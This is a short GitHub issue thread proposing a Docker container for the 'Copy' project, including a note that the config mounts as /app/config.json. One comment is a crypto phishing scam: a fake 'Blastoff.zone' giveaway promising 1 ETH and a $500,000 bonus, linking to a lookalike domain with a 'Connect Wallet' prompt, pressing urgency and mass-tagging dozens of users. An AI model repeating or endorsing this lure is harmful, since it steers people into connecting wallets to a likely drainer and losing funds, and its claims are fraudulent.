### ISSUE TITLE
⚒️ Docker container

### ISSUE THREAD

**Issue by FRFlo** [FRFlo/Copy#19]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Proposal

Docker container with use of mounts for the config, env variables for anything else

**Comment by FRFlo** [comment]
Forgot the env and mount things

**Comment by FRFlo** [comment]
Found out the config just has to be mounted as /app/config.json

**Comment by swdthomas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
ad-si, @Szazlo, @lizejiang, @abstiger, @jfilter, @sarequl, @benelan, @master-eugene, @RomainRouzaud, @oleggtro, @Sonostevecazzo, @instinkD, @e1turin, @GoelBiju, @Brycewetzel, @vivekrp, @slava-class, @Monikaya, @eartharoid, @tbutterwith, @lesmoist, @iskyd, @owenkellogg, @krystxf, @fly51fly, @sixshooterz, @gabrielgtorrestorres, @danrue, @maviq, @mprasanjith, @lebrilla, @mebizx, @amerkestijn, @ademers, @hserranome, @sendya, @stobra, @fmotaf, @Mehyar-ALS, @AgentK9, @sacxx8, @DrMxrcy, @ccccqcccc, @zaraki673, @SplatDev, @outpoints, @SpontaneousDuck, @alwillis, @sirpappa, @baiyuanlab
